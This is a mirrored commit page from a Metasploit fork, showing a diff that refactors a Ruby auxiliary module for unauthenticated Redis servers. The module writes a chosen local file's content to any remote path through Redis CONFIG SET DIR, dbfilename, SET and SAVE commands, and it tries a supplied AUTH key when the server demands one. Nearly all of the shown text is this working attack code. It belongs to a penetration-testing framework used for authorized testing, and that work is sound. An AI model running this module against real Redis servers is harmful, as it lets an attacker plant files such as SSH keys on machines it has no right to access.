infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

make code more clear

bug/bundler_fix
nixawk 2015-12-10 15:13:50 +00:00
parent 42013c18ba
commit 0d8fc78257
1 changed files with 42 additions and 64 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
modules/auxiliary/scanner/redis/unauth_file_upload.rb
View File

@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
['URL', 'http://antirez.com/news/96'], ['URL', 'http://antirez.com/news/96'],
['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'], ['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
['URL', 'http://redis.io/topics/protocol'] ['URL', 'http://redis.io/topics/protocol']
] ]))
))
register_options( register_options(
[ [
Opt::RPORT(6379), Opt::RPORT(6379),
@ -40,14 +39,14 @@ class Metasploit3 < Msf::Auxiliary
], self.class) ], self.class)
end end
def read_timeout
datastore['READ_TIMEOUT']
end
def peer def peer
"#{rhost}:#{rport}" "#{rhost}:#{rport}"
end end
def read_timeout
datastore['READ_TIMEOUT']
end
def redis_proto(parts) def redis_proto(parts)
return if parts.blank? return if parts.blank?
command = "*#{parts.length}\r\n" command = "*#{parts.length}\r\n"
@ -57,23 +56,8 @@ class Metasploit3 < Msf::Auxiliary
command command
end end
def send_command(command) def redis_auth?(password)
command = redis_proto(command) data = send_command(['AUTH', "#{password}"])
sock.put(command)
sock.get_once(-1, read_timeout)
end
def auth?(password)
report_service(
host: rhost,
port: rport,
name: 'redis',
proto: 'tcp'
)
command = ['AUTH', "#{password}"]
data = send_command(command)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
if data && data.include?('+OK') if data && data.include?('+OK')
true true
else else
@ -81,66 +65,60 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
def send_command(command)
sock.put("#{redis_proto(command)}")
data = sock.get_once(-1, read_timeout)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump}")
data
end
def send_file(path, content) def send_file(path, content)
report_service(
host: rhost,
port: rport,
name: 'redis',
proto: 'tcp'
)
dirname = File.dirname(path)
basename = File.basename(path)
key = Rex::Text.rand_text_alpha(32) key = Rex::Text.rand_text_alpha(32)
command = ['CONFIG', 'SET', 'DIR', "#{dirname}"] commands = [
data = send_command(command) ['CONFIG', 'SET', 'DIR', "#{File.dirname(path)}"],
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}") ['CONFIG', 'SET', 'dbfilename', "#{File.basename(path)}"],
return unless data.include?('+OK') ['SET', "#{key}", "#{content}"],
['SAVE'],
['DEL', "#{key}"]
]
command = ['CONFIG', 'SET', 'dbfilename', "#{basename}"] results = []
data = send_command(command) commands.each do |command|
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}") results << send_command(command)
return unless data.include?('+OK') end
command = ['SET', "#{key}", "#{content}"] return unless results[3] && results[3].include?('+OK')
data = send_command(command) print_good("#{peer} - write data to redis server #{path}")
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
print_good("#{rhost}:#{rport}: save file to #{path}")
report_note( report_note(
type: 'redis_unauth_file_upload', type: 'redis_unauth_file_upload',
host: rhost, host: rhost,
port: rport, port: rport,
proto: 'tcp', proto: 'tcp',
data: "Save it to #{path} on remote server successfully", data: "write data to redis server #{path}"
) )
command = ['SAVE']
data = send_command(command)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
command = ['DEL', "#{key}"]
data = send_command(command)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK')
end end
def run_host(ip) def run_host(ip)
begin begin
connect connect
res = send_command(['PING']) res = send_command(['PING'])
print_status("#{peer} - No Response") unless res unless res
print_status("#{peer} - No response")
return
end
if res =~ /PONG/ case res
when /PONG/
print_status("#{peer} - No authentication protection")
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n" content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
send_file(datastore['RemoteFile'], content) send_file(datastore['RemoteFile'], content)
elsif res =~ /NOAUTH Authentication required/ when /NOAUTH Authentication required/
if auth?(datastore['AUTH_KEY']) print_status("#{peer} - Trying to auth redis server")
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n" return unless redis_auth?(datastore['AUTH_KEY'])
send_file(datastore['RemoteFile'], content) content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
end send_file(datastore['RemoteFile'], content)
else
print_status("#{peer} - #{res}")
end end
rescue ::Exception => e rescue ::Exception => e